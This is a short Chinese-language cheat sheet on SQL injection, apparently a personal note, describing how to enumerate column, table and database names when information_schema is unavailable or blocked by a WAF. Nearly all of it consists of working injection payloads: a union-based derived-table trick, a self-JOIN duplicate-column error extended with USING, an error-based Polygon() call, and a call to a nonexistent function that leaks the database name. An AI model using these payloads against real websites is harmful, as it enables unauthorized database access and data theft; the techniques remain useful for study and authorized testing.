遇到了information_schema.columns因为权限不足,导致无法知道字段名,后来网上东找西找,找到通过其他方式来爆的方法。也适用于waf过滤information_schema库等绕过。
字段名
union
select * from test where id =1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from test)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
不使用union
select name from test where id=1 and (select * from (select * from test as a join test as b) as c);
// 第一个字段出来后,使用using爆第二个
select name from test where id=1 and (select * from (select * from test as a join test as b using(id)) as c);
表名
// 如果传参不是Linestring就会报错,如果传参是已知字段名,就会爆库,表,字段名
select * from test where id=1 and Polygon(id);
库名
// 库中不存在a函数,就会爆出此库无a函数
select * from test where id=1-a();